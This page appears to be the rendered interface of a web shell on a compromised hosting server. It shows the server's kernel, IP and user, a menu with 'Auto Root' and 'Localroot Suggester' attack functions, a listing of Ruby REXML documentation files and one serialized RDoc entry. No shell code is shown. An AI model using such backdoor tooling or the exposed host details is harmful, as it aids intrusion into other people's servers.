Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
ri /
system /
REXML /
Element /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d-i.ri
882
B
-rw-r--r--
2023-06-06 18:25
__to_xpath_helper-i.ri
269
B
-rw-r--r--
2023-06-06 18:25
add_attribute-i.ri
1.35
KB
-rw-r--r--
2023-06-06 18:25
add_attributes-i.ri
666
B
-rw-r--r--
2023-06-06 18:25
add_element-i.ri
1.07
KB
-rw-r--r--
2023-06-06 18:25
add_namespace-i.ri
952
B
-rw-r--r--
2023-06-06 18:25
add_text-i.ri
1.01
KB
-rw-r--r--
2023-06-06 18:25
attribute-i.ri
270
B
-rw-r--r--
2023-06-06 18:25
attributes-i.ri
362
B
-rw-r--r--
2023-06-06 18:25
cdatas-i.ri
333
B
-rw-r--r--
2023-06-06 18:25
cdesc-Element.ri
1.75
KB
-rw-r--r--
2023-06-06 18:25
clone-i.ri
461
B
-rw-r--r--
2023-06-06 18:25
comments-i.ri
339
B
-rw-r--r--
2023-06-06 18:25
context-i.ri
378
B
-rw-r--r--
2023-06-06 18:25
delete_attribute-i.ri
1.11
KB
-rw-r--r--
2023-06-06 18:25
delete_element-i.ri
965
B
-rw-r--r--
2023-06-06 18:25
delete_namespace-i.ri
814
B
-rw-r--r--
2023-06-06 18:25
document-i.ri
401
B
-rw-r--r--
2023-06-06 18:25
each_element-i.ri
350
B
-rw-r--r--
2023-06-06 18:25
each_element_with_attribute-i.ri
1.41
KB
-rw-r--r--
2023-06-06 18:25
each_element_with_text-i.ri
1.33
KB
-rw-r--r--
2023-06-06 18:25
each_with_something-i.ri
364
B
-rw-r--r--
2023-06-06 18:25
elements-i.ri
358
B
-rw-r--r--
2023-06-06 18:25
get_elements-i.ri
647
B
-rw-r--r--
2023-06-06 18:25
get_text-i.ri
693
B
-rw-r--r--
2023-06-06 18:25
has_attributes%3f-i.ri
382
B
-rw-r--r--
2023-06-06 18:25
has_elements%3f-i.ri
612
B
-rw-r--r--
2023-06-06 18:25
has_text%3f-i.ri
350
B
-rw-r--r--
2023-06-06 18:25
ignore_whitespace_nodes-i.ri
277
B
-rw-r--r--
2023-06-06 18:25
inspect-i.ri
245
B
-rw-r--r--
2023-06-06 18:25
instructions-i.ri
351
B
-rw-r--r--
2023-06-06 18:25
namespace-i.ri
1.08
KB
-rw-r--r--
2023-06-06 18:25
namespaces-i.ri
251
B
-rw-r--r--
2023-06-06 18:25
new-c.ri
1.87
KB
-rw-r--r--
2023-06-06 18:25
next_element-i.ri
605
B
-rw-r--r--
2023-06-06 18:25
node_type-i.ri
249
B
-rw-r--r--
2023-06-06 18:25
prefixes-i.ri
567
B
-rw-r--r--
2023-06-06 18:25
previous_element-i.ri
628
B
-rw-r--r--
2023-06-06 18:25
raw-i.ri
581
B
-rw-r--r--
2023-06-06 18:25
root-i.ri
239
B
-rw-r--r--
2023-06-06 18:25
root_node-i.ri
1.39
KB
-rw-r--r--
2023-06-06 18:25
text%3d-i.ri
1.46
KB
-rw-r--r--
2023-06-06 18:25
text-i.ri
1.05
KB
-rw-r--r--
2023-06-06 18:25
texts-i.ri
330
B
-rw-r--r--
2023-06-06 18:25
whitespace-i.ri
898
B
-rw-r--r--
2023-06-06 18:25
write-i.ri
1.51
KB
-rw-r--r--
2023-06-06 18:25
xpath-i.ri
241
B
-rw-r--r--
2023-06-06 18:25
Save
Rename
U:RDoc::AnyMethod[iI"add_namespace:ETI"!REXML::Element#add_namespace;TF:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"&Adds a namespace to this element.;To:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@label[I"prefix;T; [o; ; [I"=the prefix string, or the namespace URI if +uri+ is not ;TI" supplied;To;;[I"uri;T; [o; ; [I"Bthe namespace URI. May be nil, in which +prefix+ is used as ;TI"the URI;To; ; [I"Evaluates to: this Element;To:RDoc::Markup::Verbatim; [ I"a = Element.new("a") ;TI"*a.add_namespace("xmlns:foo", "bar" ) ;TI"Ba.add_namespace("foo", "bar") # shorthand for previous line ;TI" a.add_namespace("twiddle") ;TI"6puts a #-> <a xmlns:foo='bar' xmlns='twiddle'/>;T:@format0: @fileI"lib/rexml/element.rb;T:0@omit_headings_from_table_of_contents_below000[ I"( prefix, uri=nil );T@*FI"Element;TcRDoc::NormalClass00